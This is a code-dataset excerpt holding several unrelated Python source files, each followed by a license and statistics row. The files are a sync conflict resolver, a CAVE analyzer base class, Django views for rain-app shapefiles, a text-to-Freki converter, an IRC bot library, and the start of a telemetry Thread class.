if a_changed and b_changed:
# item was modified on both sides
# OR: missing status
yield ResolveConflict(ident)
elif a_changed and not b_changed:
# item was only modified in a
yield Update(a_info.get_item_cache(ident), b_info)
elif not a_changed and b_changed:
# item was only modified in b
yield Update(b_info.get_item_cache(ident), a_info)
elif a and not b:
if a_info.is_changed(ident):
# was deleted from b but modified on a
# OR: new item was created in a
yield Upload(a_info.get_item_cache(ident), b_info)
else:
# was deleted from b and not modified on a
yield Delete(ident, a_info)
elif not a and b:
if b_info.is_changed(ident):
# was deleted from a but modified on b
# OR: new item was created in b
yield Upload(b_info.get_item_cache(ident), a_info)
else:
# was deleted from a and not changed on b
yield Delete(ident, b_info)
| mit | -1,180,072,998,141,565,400 | 34.91411 | 78 | 0.562948 | false | 4.068103 | false | false | false |
automl/SpySMAC | cave/analyzer/base_analyzer.py | 1 | 5492 | import logging
from collections import OrderedDict
from typing import Tuple
from bokeh.io import output_notebook
from bokeh.plotting import show
from cave.html.html_builder import HTMLBuilder
from cave.reader.runs_container import RunsContainer
from cave.utils.exceptions import Deactivated
class BaseAnalyzer(object):
"""
The base class for analyzing methods. To create a new analyzer, inherit from this class and extend.
If you already have an analyzer, but need a wrapper to call it, also inherit it from this class.
You should overwrite the "get_name"-method.
    Currently the initialization calls the analysis. After the analyzer has run, the results should be saved to the member
self.result, which is a dictionary with a defined structure.
The docstrings (this part) will be used to display a tooltip / help for the analyzer, so it should be a descriptive
    and concise small paragraph describing the analyzer and its results.
    Remember to call super().__init__(runscontainer) in your analyzer's __init__-method. This will initialize the logger,
name and important attributes.
All configurator data is available via the self.runscontainer.
"""
def __init__(self,
runscontainer: RunsContainer,
*args,
**kwargs):
"""
runscontainer: RunsContainer
contains all important information about the configurator runs
"""
self.logger = logging.getLogger(self.__module__ + '.' + self.__class__.__name__)
self.name = self.get_name()
self.logger.debug("Initializing %s", self.name)
self.runscontainer = runscontainer
self.result = OrderedDict()
self.error = False
options = self.runscontainer.analyzing_options
if self.name not in options.sections():
self.logger.warning("Please state in the analyzing options whether or not to run this Analyzer "
"(simply add a line to the .ini file containing [{}])".format(self.name))
elif not options[self.name].getboolean('run'):
raise Deactivated("{0} has been deactivated in the options. To enable, just set "
"[{0}][run] = True in the .ini file or pass the appropriate flags.".format(self.name))
self.options = options[self.name]
for k, v in kwargs.items():
if v is not None:
self.options[k] = v
self.logger.debug("{} initialized with options: {}".format(self.name, str(dict(self.options))))
def plot_bokeh(self):
"""
This function should recreate the bokeh-plot from scratch with as little overhead as possible. This is needed to
show the bokeh plot in jupyter AND save it to the webpage. The bokeh plot needs to be recreated to be displayed
        in different outputs for reasons beyond our control. So save all analysis results in the class and simply redo
the plotting with this function.
This function needs to be called if bokeh-plots are to be displayed in notebook AND saved to html-result.
"""
raise NotImplementedError()
def get_html(self, d=None, tooltip=None) -> Tuple[str, str]:
"""General reports in html-format, to be easily integrated in html-code. WORKS ALSO FOR BOKEH-OUTPUT.
Parameters
----------
d: Dictionary
a dictionary that will be later turned into a website
tooltip: string
tooltip to be displayed in report. optional, will overwrite the docstrings that are used by default.
Returns
-------
script, div: str, str
header and body part of html-code
"""
if len(self.result) == 1 and None in self.result:
self.logger.debug("Detected None-key, abstracting away...")
self.result = self.result[None]
if d is not None:
d[self.name] = self.result
d[self.name]['tooltip'] = tooltip if tooltip is not None else self.__doc__
script, div = HTMLBuilder("", "", "").add_layer(None, self.result)
combine = "\n\n".join([script, div])
return combine
def get_jupyter(self):
"""Depending on analysis, this creates jupyter-notebook compatible output."""
bokeh_plots = self.check_for_bokeh(self.result)
if bokeh_plots:
self.logger.warning("Bokeh plots cannot be re-used for notebook if they've already been \"components\"'ed. "
"To be sure, get_jupyter should be overwritten for bokeh-producing analyzers.")
output_notebook()
for bokeh_plot in bokeh_plots:
show(bokeh_plot)
else:
from IPython.core.display import HTML, display
display(HTML(self.get_html()))
@classmethod
def check_for_bokeh(cls, d):
"""
        Check if there are bokeh-plots in the output of this analyzer by checking the result-dictionary for the bokeh
keyword.
"""
result = [] # all bokeh models
for k, v in d.items():
if isinstance(v, dict):
res = cls.check_for_bokeh(v)
if res:
result.extend(res)
if k == 'bokeh':
result.append(v)
return result
def get_name(self):
return self.__class__.__name__ # Back-up, can be overwritten, will be used as a name for analysis
| bsd-3-clause | -1,194,562,411,713,696,500 | 44.766667 | 120 | 0.628186 | false | 4.483265 | false | false | false |
lizardsystem/lizard5-apps | lizard_rainapp/views.py | 1 | 5811 | # (c) Nelen & Schuurmans. GPL licensed, see LICENSE.rst.
# -*- coding: utf-8 -*-
"""Views for the RainApp, mostly a page to upload new region shapefiles."""
# Python 3 is coming
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import io
import logging
import operator
import os
import shutil
import tempfile
import zipfile
import shapefile
from django.contrib.gis.geos import GEOSGeometry
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import Http404
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.views.generic import TemplateView
from django.views.generic import View
from lizard_ui.views import ViewContextMixin
from . import forms
from . import models
logger = logging.getLogger(__name__)
class AdminView(ViewContextMixin, TemplateView):
template_name = "lizard_rainapp/admin.html"
def dispatch(self, request, *args, **kwargs):
if not request.user.has_perm('lizard_rainapp.change_geoobject'):
raise PermissionDenied()
return super(AdminView, self).dispatch(request, *args, **kwargs)
def get(self, request):
self.form = forms.UploadShapefileForm()
return super(AdminView, self).get(request)
def post(self, request):
self.form = forms.UploadShapefileForm(
request.POST, request.FILES)
if not self.form.is_valid():
return super(AdminView, self).get(request)
try:
self.save_shape()
finally:
self.form.clean_temporary_directory()
return HttpResponseRedirect(
reverse("lizard_rainapp_admin"))
def get_field(self, feature, fieldname, default=None):
try:
name = self.form.cleaned_data[fieldname]
return feature.GetField(
feature.GetFieldIndex(name.encode('utf8')))
except ValueError:
return default
def save_shape(self):
rainappconfig = self.form.cleaned_data['config']
# First, delete old data
models.GeoObject.objects.filter(
config=rainappconfig).delete()
shape = self.form.open_shapefile()
layer = shape.GetLayer()
num_features = 0
for feature in layer:
geom = feature.GetGeometryRef()
models.GeoObject.objects.create(
municipality_id=self.get_field(feature, 'id_field'),
name=self.get_field(feature, 'name_field'),
x=self.get_field(feature, 'x_field'),
y=self.get_field(feature, 'y_field'),
area=self.get_field(feature, 'area_field'),
geometry=GEOSGeometry(geom.ExportToWkt(), srid=4326),
config=rainappconfig)
num_features += 1
logger.debug("Added {} features.".format(num_features))
def rainapp_configs(self):
return models.RainappConfig.objects.all()
class DownloadShapeView(View):
def dispatch(self, request, *args, **kwargs):
if not request.user.has_perm('lizard_rainapp.change_geoobject'):
raise PermissionDenied()
return super(DownloadShapeView, self).dispatch(
request, *args, **kwargs)
def get(self, request, slug):
try:
rainappconfig = models.RainappConfig.objects.get(
slug=slug)
except models.RainappConfig.DoesNotExist:
raise Http404()
if not rainappconfig.has_geoobjects:
raise Http404()
bytebuffer = self.save_data_to_zip(rainappconfig)
# Setup HTTPResponse for returning a zip file
response = HttpResponse(content_type='application/zip')
response['Content-Disposition'] = (
'attachment; filename={}.zip'.format(slug))
response.write(bytebuffer.read())
return response
def save_data_to_zip(self, rainappconfig):
# Save a shapefile to a temp directory
temp_dir = tempfile.mkdtemp()
try:
shapefile_path = os.path.join(
temp_dir, rainappconfig.slug)
shp = shapefile.Writer(shapefile.POLYGON)
shp.field(b'ID_NS')
shp.field(b'ID')
shp.field(b'X', b'F', 11, 5)
shp.field(b'Y', b'F', 11, 5)
shp.field(b'AREA', b'F', 11, 5)
for geo in models.GeoObject.objects.filter(config=rainappconfig):
if str(geo.geometry).startswith('MULTIPOLYGON'):
# For pyshp, multipolygons are basically normal
# polygons with all the parts after each other. Meaning
# we need to add them together them by hand.
geometry = [
[list(l) for l in polygon] for polygon in geo.geometry]
geometry = reduce(operator.add, geometry, [])
else:
geometry = [list(l) for l in geo.geometry]
shp.poly(parts=geometry)
shp.record(
geo.municipality_id,
geo.name,
geo.x,
geo.y,
geo.area)
shp.save(shapefile_path)
# Create a zipfile in a BytesIO buffer
bytebuffer = io.BytesIO()
zipf = zipfile.ZipFile(bytebuffer, 'w', zipfile.ZIP_DEFLATED)
for filename in os.listdir(temp_dir):
zipf.write(os.path.join(temp_dir, filename), filename)
zipf.close()
bytebuffer.seek(0)
return bytebuffer
finally:
# Remove temporary directory
shutil.rmtree(temp_dir)
| lgpl-3.0 | 6,633,258,897,341,782,000 | 31.646067 | 79 | 0.601101 | false | 4.153681 | true | false | false |
xigt/freki | freki/text2freki.py | 1 | 6059 | from freki.serialize import FrekiDoc, FrekiBlock, FrekiLine
import codecs
import re
import chardet
import logging
import argparse
def run(args):
frek = read_and_convert(args.infile, args.igtfile, args.encoding, args.detect)
out = open(args.outfile, 'w', encoding='utf8')
out.write(str(frek))
def convert_text(doc_id, text, span_text=None):
"""
Convert a string to freki
:param doc_id: name of document
:param text: text of document
:param span_text: text identifying IGT spans, if available
:return: freki object
"""
w_index = 1
wo_index = 1
pre2post = {}
for line in re.split('\r\n|\n', text):
if not re.match('^\s*$', line):
pre2post[w_index] = wo_index
wo_index += 1
w_index += 1
line_dict = {}
s_index = 0
if span_text:
for line in span_text.split('\n'):
if len(line):
parts = line.split()
tags = parts[2:]
start = int(parts[0])
for i in range(start, int(parts[1]) + 1):
try:
num = pre2post[i]
except KeyError:
print("Warning: a line specified in the igt file is a blank line in the document. "
"Check the line numbers in the igt file. Skipping the problem line.")
break
line_dict[num] = (tags[num - start], 's' + str(s_index))
s_index += 1
frek = FrekiDoc()
text = re.sub(r'(\r\n|\n){2,}', '\n\n', text)
blocks = re.split('\n\n', text)
index = 1
b_index = 1
for para in blocks:
lines = re.split('\r\n|\n', para)
linenos = []
for line in lines:
f_line = FrekiLine(line)
f_line.attrs['line'] = index
linenos.append(index)
if index in line_dict:
f_line.attrs['tag'] = line_dict[index][0]
f_line.attrs['span_id'] = line_dict[index][1]
frek.add_line(f_line)
index += 1
block = FrekiBlock(linenos, linenos[0], linenos[-1], frek)
block._attrs['page'] = '1'
block._attrs['block_id'] = 'b' + str(b_index)
block._attrs['doc_id'] = doc_id
b_index += 1
frek.add_block(block)
return frek
def read_and_convert(path, igt_path=None, encoding='utf-8', detect_encoding=False):
"""
Read in a text file and convert it to freki. igt_path file format: startline endline tag1 tag2 ... tagN\n
:param path: path to the text file
:param igt_path: path to the text file containing IGT span info
:param encoding: name of the encoding of the file
:param detect_encoding: setting to true will first detect an encoding rather than using the default.
:return: freki object
"""
name = path.split('/')[-1].split('.')[0]
igt_text = None
if detect_encoding:
bytes = open(path, 'rb').read()
p_predict = chardet.detect(bytes)
text = codecs.open(path, encoding=p_predict['encoding'], errors='strict').read()
if igt_path:
i_predict = chardet.detect(open(igt_path, 'rb').read())
igt_text = codecs.open(igt_path, encoding=i_predict['encoding']).read()
logging.info('Using encoding: ' + p_predict['encoding'])
logging.info('Encoding detection uses the Chardet library: https://pypi.python.org/pypi/chardet')
else:
try:
text = codecs.open(path, encoding=encoding, errors='strict').read()
if igt_path:
igt_text = codecs.open(igt_path, encoding=encoding).read()
except UnicodeDecodeError:
bytes = open(path, 'rb').read()
p_predict = chardet.detect(bytes)
text = codecs.open(path, encoding=p_predict['encoding'], errors='strict').read()
if igt_path:
i_predict = chardet.detect(open(igt_path, 'rb').read())
igt_text = codecs.open(igt_path, encoding=i_predict['encoding']).read()
logging.info('The file cannot be read using encoding ' + encoding + '. Instead using ' + p_predict['encoding'])
logging.info('Encoding detection uses the Chardet library: https://pypi.python.org/pypi/chardet\n')
logging.info("If encoding " + p_predict['encoding'] + ' is not correct please specify the encoding as an argument')
logging.info('For a detailed list of encodings available in Python visit https://docs.python.org/2.4/lib/standard-encodings.html')
except LookupError:
print('Unknown encoding. If you want the system to automatically detect an encoding set detect_encoding=True')
print('For a detailed list of encodings available in Python visit https://docs.python.org/2.4/lib/standard-encodings.html')
raise
frek = convert_text(name, text, igt_text)
return frek
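# Illustrative sketch (assumed paths, not part of the original module): convert
# a plain text file plus an optional IGT span file and write the Freki output.
def _example_convert(txt_path, igt_path, out_path):
    doc = read_and_convert(txt_path, igt_path, encoding='utf-8')
    with open(out_path, 'w', encoding='utf8') as out:
        out.write(str(doc))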
def main(arglist=None):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Convert a plain text file to Freki format",
prog='text-to-freki',
epilog='examples:\n'
' text-to-freki in.txt out.freki --igtfile=igts.txt --detect-encoding=true'
)
parser.add_argument('infile', help='plain text file')
parser.add_argument('outfile', help='path to freki output file')
parser.add_argument('--igtfile', help='plain text file containing igt span info')
parser.add_argument('--encoding', default='utf-8', help='encoding of the input file')
parser.add_argument(
'-d', '--detect-encoding', dest='detect', default=False, help='automatically detects encoding when set to true'
)
parser.add_argument(
'-v', '--verbose',
action='count', dest='verbosity', default=2,
help='increase the verbosity (can be repeated: -vvv)'
)
args = parser.parse_args(arglist)
logging.basicConfig(level=50-(args.verbosity*10))
run(args)
if __name__ == '__main__':
main() | mit | 3,247,367,411,610,069,000 | 41.083333 | 142 | 0.592837 | false | 3.714899 | false | false | false |
deadc0de6/pyircbot | libirc.py | 1 | 18336 | # author: deadc0de6
# contact: https://github.com/deadc0de6
#
# python IRC library
#
# Copyright (C) 2015 deadc0de6
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ref:
# RFC 2812: https://tools.ietf.org/html/rfc2812
# https://www.alien.net.au/irc/irc2numerics.html
#
import socket
import ssl
import sys
import os
import time
import datetime
import string
import random
import threading
import signal
import select
import Queue
class libirc():
BUFLEN = 65535 # buffer to read IRC server message
DEBUG = False
LOGCHAT_NBLINE = 100 # per channel
CONN_TIMEOUT = 5 # second
SELECTTO = 1
ISOPER = False
SSL_CERT_PATH = '/etc/ssl/certs/ca-certificates.crt'
IRC_CMD_QUIT = 'quit'
IRC_CMD_PASS = 'pass'
IRC_CMD_JOIN = 'join' # <channel>
IRC_CMD_USER = 'user' # <username> <hostname> <servername> <realname>
IRC_CMD_NICK = 'nick' # <nickname>
IRC_CMD_PRIVMSG = 'privmsg' # <user> <message>
IRC_CMD_PING = 'ping'
IRC_CMD_PONG = 'pong'
IRC_CMD_LIST = 'list'
IRC_CMD_OPER = 'oper'
IRC_CMD_KICK = 'kick'
IRC_CMD_KILL = 'kill'
IRC_CMD_ERROR = 'error'
IRC_CMD_NAMES = 'names'
IRC_CMD_WHO = 'who'
IRC_CMD_NOTICE = 'notice'
IRC_CMD_CHANNEL = '321'
IRC_CMD_ACHANNEL = '322'
IRC_CMD_CHANNEL_END = '323'
IRC_CMD_MOTD = '375'
IRC_CMD_MTD_END = '376'
IRC_ERR_NICK = '433'
IRC_CMD_CHAN_NAMES = '353'
IRC_CMD_OPER_OK = '381'
# @host: irc server address
# @port: irc server port
  # @ssl: use SSL (True) or not (False)
# @nick: the bot nick
# @channel: the bot channel
# @threaded: is it to be threaded
# TODO really need the threaded option ??
def __init__(self, host, port, ssl, nick, channel, threaded=True):
self._server_host = host
self._server_port = port
self._server_ssl = ssl
self._nick = nick
self._orichannel = channel
    self._threaded = threaded # calls to callbacks are threaded
# some glob vars
self._pwd = None # server password
self._channels = [] # list of channels
self._conn_channels = [] # list of channels
self._nicks = [] # list of nicks on channels I'm on
self._connected = False
self._stop = False
self._logchat = False
    self._logchat_logs = {} # for each channel name, a list of exchanges
self._sndqueue = Queue.Queue()
# callbacks
self._irc_event_on_message = None
self._irc_event_on_privmessage = None
self._irc_event_on_disconnect = None
self._irc_event_on_connect = None
self._irc_event_on_new_channel = None
self._irc_event_on_servping = None
self._irc_event_on_othermsg = None
self._irc_event_on_conn_channel = None
    # dirty hack as signals are not caught by the KeyboardInterrupt
signal.signal(signal.SIGINT, self._signal_handler)
def set_password(self, pwd):
self._pwd = pwd
# enable/disable the log chat features
# logs N lines of each channel it is on
def irc_set_logchat(self, boolean):
self._logchat = boolean
def set_callback(self, on_privmessage = None, on_message = None,\
on_disconnect = None, on_connect = None,\
on_new_channel = None, on_servping = None, on_othermsg = None,\
on_conn_chan = None):
self._irc_event_on_privmessage = on_privmessage
self._irc_event_on_message = on_message
self._irc_event_on_disconnect = on_disconnect
self._irc_event_on_connect = on_connect
self._irc_event_on_new_channel = on_new_channel
self._irc_event_on_servping = on_servping
self._irc_event_on_othermsg = on_othermsg
self._irc_event_on_conn_channel = on_conn_chan
def irc_listchannels(self):
if self._socket == None:
return False
self._irc_send_cmd(self.IRC_CMD_LIST, [])
return True
def irc_join_channel(self, chanstr):
if self._socket == None:
return False
if not chanstr in self._conn_channels:
self._irc_send_cmd(self.IRC_CMD_JOIN, [chanstr])
self._conn_channels.append(chanstr)
return True
# send a message to all channel I'm on
def irc_send_to_all_channels(self, msg):
for chan in self._conn_channels:
self._irc_send_cmd(self.IRC_CMD_PRIVMSG, [chan], [msg])
# send a message to a channel
def irc_channel_broadcast(self, chan, msg):
if not self._connected:
return False
if not chan in self._conn_channels:
return False
self._irc_send_cmd(self.IRC_CMD_PRIVMSG, [chan], [msg])
return True
# send a private message to a user
def irc_privmsg(self, user, msg):
if not self._connected:
return False
for i in msg.splitlines():
self._irc_send_cmd(self.IRC_CMD_PRIVMSG, [user], [i])
return True
# kill a user
def irc_kill(self, user, reason):
if not self._connected:
return False
if not self.ISOPER:
return False
self._irc_send_cmd(self.IRC_CMD_KILL, [user, reason])
return True
# kick user from all channels
def irc_kick_all(self, user, reason):
if not self._connected:
return False
if not self.ISOPER:
return False
self.irc_kick(user, '*', reason)
return True
# kick a user from a channel
# syntax: kick <channel> <user> <reason>
def irc_kick(self, user, channel, reason):
if not self._connected:
return False
if not self.ISOPER:
return False
self._irc_send_cmd(self.IRC_CMD_KICK, [user, channel, reason])
return True
# do we know this user
def irc_known_nick(self, user):
return (user in self._nicks)
	# 0 means all lines
def irc_get_chan_logs(self, chan, nbline=0):
nbline = int(nbline)
if not self._logchat:
return None
if not chan in self._logchat_logs:
return None
if nbline == 0 or nbline > len(self._logchat_logs[chan]):
return self._logchat_logs[chan]
else:
tmp = self._logchat_logs[chan][-nbline:]
return tmp
def _signal_handler(self, signum, frame):
self._stop = True
# timestamp to string
def _ts2str(self, ts):
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(ts))
# print debug message
def _irc_debug(self, txt):
datestr = self._ts2str(time.time())
sys.stderr.write("[IRC] <" + datestr + "> " + txt + "\n")
# print error message
def _irc_err(self, txt):
sys.stderr.write("[IRC ERROR] " + txt)
# this is the main loop reading from the socket
def _irc_read_loop(self):
success = True
self._irc_debug('bot started (read loop started) ....')
self._socket.setblocking(0)
try:
while not self._stop:
try:
wsocks = []
rsocks = [self._socket]
esocks = [self._socket]
if not self._sndqueue.empty():
wsocks.append(self._socket)
iready,oready,eready = select.select(rsocks, wsocks, esocks,
self.SELECTTO)
if self._socket in eready:
self._irc_debug('[ERROR] socket error in select')
if self._socket in oready and not self._sndqueue.empty():
data = self._sndqueue.get()
self._socket.send(data)
if self._socket in iready:
data = self._socket.recv(self.BUFLEN)
for line in data.splitlines():
if not self._irc_handle_line(line):
# not very resilient
success = False
break
if not success:
break
except socket.error as serr:
#pass
# TODO
self._irc_err('socket error')
print serr
except select.error as serr:
#pass
# TODO
self._irc_err('select error')
print serr
except KeyboardInterrupt:
print 'interrupted ...'
self._irc_debug('bot ended (read loop exited)')
return success
# handle anything that appears on the IRC and that I see
def _irc_handle_line(self, line):
if line == None or line == '':
return True
#try:
if self.DEBUG:
self._irc_debug("<- " + line)
# TODO from here
msg = ircmsg(line)
if msg.cmd == self.IRC_CMD_CHANNEL:
# start of channel list
self._irc_debug('start of channel listing')
elif msg.cmd == self.IRC_CMD_CHANNEL_END:
# end of channel list
self._irc_debug('end of channel listing')
elif msg.cmd == self.IRC_CMD_ACHANNEL:
# new channel
self._irc_debug('<- new channel: %s' % (msg.param[1]))
self._channels.append(msg.param[1])
if self._irc_event_on_new_channel != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_new_channel,
args=(msg.param[1],))
t.start()
else:
					self._irc_event_on_new_channel(msg.param[1])
elif msg.cmd == self.IRC_CMD_MTD_END:
# end of MOTD
self._irc_debug('joining channel: %s' % (self._orichannel))
self._connected = True
self.irc_join_channel(self._orichannel)
elif msg.cmd == self.IRC_CMD_OPER_OK:
self.ISOPER = True
elif msg.cmd == self.IRC_ERR_NICK:
# nick registration error
self._nick = self._nick + "^"
self._irc_debug('changing nick to: %s' % (self._nick))
self._irc_send_cmd(self.IRC_CMD_NICK, [self._nick])
elif msg.cmd == self.IRC_CMD_PING:
# this is a PING from server
self._irc_debug('<- \"ping\"')
self._irc_send_cmd(self.IRC_CMD_PONG, [msg.src])
if self._irc_event_on_servping != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_servping)
t.start()
else:
self._irc_event_on_servping()
elif msg.cmd == self.IRC_CMD_PRIVMSG and msg.param[0] == self._nick:
# this is a private message sent to myself
self._irc_debug('<- private message to me')
if self._irc_event_on_privmessage != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_privmessage, args=(msg,))
t.start()
else:
self._irc_event_on_privmessage(msg)
elif msg.cmd == self.IRC_CMD_PRIVMSG and msg.param[0] != self._nick:
# this is a message sent to a channel I'm on
self._irc_debug('<- message in channel: %s' % (msg.param[0]))
if self._irc_event_on_message != None:
if self._logchat:
self._irc_log(msg)
if self._threaded:
t = threading.Thread(target=self._irc_event_on_message, args=(msg,))
t.start()
else:
self._irc_event_on_message(msg)
elif msg.cmd == self.IRC_CMD_JOIN:
if msg.user != self._nick:
# another user join our channel
self._nicks.append(msg.user)
else:
if msg.msg[0] in self._conn_channels:
if self._irc_event_on_conn_channel != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_conn_channel,
args=(msg.msg[0],))
t.start()
else:
self._irc_event_on_conn_channel(msg.msg[0])
elif msg.cmd == self.IRC_CMD_CHAN_NAMES:
# list of names in the channel
for u in msg.msg:
if not u in self._nicks and u != self._nick:
self._nicks.append(u)
self._irc_debug('nicks list updated: %s' % (','.join(self._nicks)))
elif msg.cmd == self.IRC_CMD_ERROR:
# oops some error
self._irc_debug('ERROR ! (%s)' % (' '.join(msg.msg)))
return False
elif msg.cmd == self.IRC_CMD_NOTICE:
# this is a notice
self._irc_debug('notice received: %s %s' % (msg.param[0],
' '.join(msg.msg)))
if self._irc_event_on_othermsg != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_othermsg,
args=(msg,))
t.start()
else:
self._irc_event_on_othermsg(msg)
else:
# this is what's left
#self._irc_debug('other message received: %s' % (msg.cmd))
if self._irc_event_on_othermsg != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_othermsg,
args=(msg,))
t.start()
else:
self._irc_event_on_othermsg(msg)
#except Exception as msg:
# print msg
# exc_type, exc_obj, exc_tb = sys.exc_info()
# fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
# print exc_type, fname, exc_tb.tb_lineno
# return False
return True
def _irc_log(self, ircmsg):
user = ircmsg.user
chan = ircmsg.param[0]
msg = ' '.join(ircmsg.msg)
if chan in self._logchat_logs:
tmp = self._logchat_logs[chan]
if len(self._logchat_logs) > self.LOGCHAT_NBLINE:
# remove one
del tmp[0]
tmp.append('[%s] %s' % (user, msg))
self._logchat_logs[chan] = tmp
else:
l = ['[%s] %s' % (user, msg)]
self._logchat_logs[chan] = l
# send an IRC command to the server
	# @params: list of parameters for the command
	# @msg: optional trailing part (sent after " :", may contain spaces),
	#       typically the message text of PRIVMSG/NOTICE
def _irc_send_cmd(self, cmd, params, msg=[], log=True):
if self._socket == None:
return False
data = '%s %s' % (cmd, ' '.join(params))
if msg != []:
data += ' :%s' % (' '.join(msg))
data += '\n'
if log:
self._irc_debug('-> \"%s\"' % (data.rstrip()))
self._sndqueue.put(data)
return True
# connect to IRC server
def irc_connect(self):
sock = None
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
if self._server_ssl:
# https://docs.python.org/2/library/ssl.html
sock = ssl.wrap_socket(s, server_side=False)
else:
sock = s
sock.settimeout(self.CONN_TIMEOUT)
sock.connect((self._server_host, int(self._server_port)))
sock.settimeout(None)
except socket.error as err:
self._irc_err("Connection error: ")
print err
if self._server_ssl:
sock.unwrap()
sock.close()
return False
self._irc_debug("IRC socket connected!")
self._socket = sock
if self._irc_event_on_connect != None:
self._irc_debug('calling connect callback ...')
if self._threaded:
t = threading.Thread(target=self._irc_event_on_connect)
t.start()
else:
self._irc_event_on_connect()
#self._irc_debug('calling read-loop ...')
#t = threading.Thread(target=self._irc_read_loop)
#t.start()
# conn and nick
time.sleep(1)
self._irc_debug('sending nick and other information to the server ...')
		if self._pwd != None:
			self._irc_send_cmd(self.IRC_CMD_PASS, [self._pwd], log=False)
self._irc_send_cmd(self.IRC_CMD_USER, [self._nick, self._nick, self._nick], [self._nick], log=False)
self._irc_send_cmd(self.IRC_CMD_NICK, [self._nick], log=False)
# start the read loop
self._irc_debug('calling read-loop ...')
res = self._irc_read_loop()
try:
if self._server_ssl:
self._socket.unwrap()
except:
pass
self._socket.close()
return res
def irc_gooper(self, username, password):
if username != '' and password != '':
self._irc_debug('going operator ...')
self._irc_send_cmd(self.IRC_CMD_OPER, [username, password], log=False)
# disconnect to IRC server and close socket
def irc_disconnect(self):
# first send the quit command
self._irc_debug('disconnecting ...')
self._stop = True
if self._socket != None or not self._connected:
self._irc_debug("sending the IRC quit command !")
self._irc_send_cmd(self.IRC_CMD_QUIT, [])
# close the socket
if self._socket != None:
self._socket.close()
self._irc_debug('calling disconnect callback...')
if self._irc_event_on_disconnect != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_disconnect)
t.start()
else:
self._irc_event_on_disconnect()
class ircmsg():
DEBUG = False
def __init__(self, line):
self._line = line
self.user = '' # the user that sent the message
self.src = '' # the address of the user (username@IP)
self.cmd = '' # the IRC command in the message
self.param = [] # the target of the message (#<channel> or user)
self.msg = [] # the message
self._parse_line()
# this is a naive parser
def _parse_line(self):
# format:
# :<prefix> <command> <params> :<trailing>
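		# example (illustrative, not from the original code):
		#   ":nick!user@host PRIVMSG #chan :hello world" parses to
		#   user='nick', src='user@host', cmd='privmsg', param=['#chan'],
		#   msg=['hello', 'world']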
#try:
# identify the parts
if self.DEBUG:
self._err('full line: \"%s\"' % (self._line))
prefixend = 0
trailingstart = len(self._line)
if self._line.startswith(':'):
# prefix
dummy = self._line[1:]
prefix = dummy.split(' ')[0]
prefixend = len(prefix)+1
if '!' in prefix:
self.user = prefix.split('!')[0].lower()
self.src = prefix.split('!')[1].lower()
else:
self.src = prefix
if self.DEBUG:
self._err('prefix: %s' % (prefix))
if ' :' in self._line:
# trailing
trailing = self._line.split(' :')[1]
trailingstart = self._line.index(' :')
if self.DEBUG:
self._err('trailing: %s' % (trailing))
self.msg = [x.lower() for x in trailing.split(' ')]
cmdparams = self._line[prefixend:trailingstart].strip()
if self.DEBUG:
self._err('cmdparams: %s' % (cmdparams))
self.cmd = cmdparams.split(' ')[0].lower()
self.param = [x.lower() for x in cmdparams.split(' ')[1:]]
#except:
# self._err(self._line)
if self.DEBUG:
self.print_msg()
def _err(self, string):
sys.stderr.write('[IRCMSG] %s\n' % (string))
def print_msg(self):
self._err('Message (%s)' % (self._line))
self._err('\tuser: %s' % (self.user))
self._err('\tsrc: %s' % (self.src))
self._err('\tcmd: %s' % (self.cmd))
self._err('\tparam: %s' % (','.join(self.param)))
self._err('\tmsg: %s' % (','.join(self.msg)))
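# ---------------------------------------------------------------------------
# Minimal usage sketch (illustrative, not part of the original library).
# The server address, nick and channel below are placeholder assumptions;
# irc_connect() blocks in the read loop until the connection ends.
# ---------------------------------------------------------------------------
def _libirc_example():
	def on_msg(msg):
		# msg is an ircmsg instance; param[0] is the channel the text was sent to
		print '[%s] %s: %s' % (msg.param[0], msg.user, ' '.join(msg.msg))
	bot = libirc('irc.example.net', 6667, False, 'examplebot', '#example')
	bot.set_password('secret')	# only needed if the server expects a password
	bot.set_callback(on_message=on_msg)
	bot.irc_connect()
	bot.irc_disconnect()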
| gpl-2.0 | -3,772,198,053,339,212,000 | 31.39576 | 104 | 0.602694 | false | 3.322943 | false | false | false |
endlessm/chromium-browser | third_party/catapult/telemetry/telemetry/timeline/thread.py | 1 | 9786 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import telemetry.timeline.async_slice as async_slice_module
import telemetry.timeline.event_container as event_container
import telemetry.timeline.flow_event as flow_event_module
import telemetry.timeline.sample as sample_module
import telemetry.timeline.slice as slice_module
class Thread(event_container.TimelineEventContainer):
"""A Thread stores all the trace events collected for a particular
thread. We organize the synchronous slices on a thread by "subrows," where
subrow 0 has all the root slices, subrow 1 those nested 1 deep, and so on.
The asynchronous slices are stored in an AsyncSliceGroup object.
"""
def __init__(self, process, tid):
super(Thread, self).__init__('thread %s' % tid, parent=process)
self.tid = tid
self._async_slices = []
self._flow_events = []
self._samples = []
self._toplevel_slices = []
self._all_slices = []
# State only valid during import.
self._open_slices = []
self._newly_added_slices = []
@property
def toplevel_slices(self):
return self._toplevel_slices
@property
def all_slices(self):
return self._all_slices
@property
def samples(self):
return self._samples
@property
def async_slices(self):
return self._async_slices
@property
def open_slice_count(self):
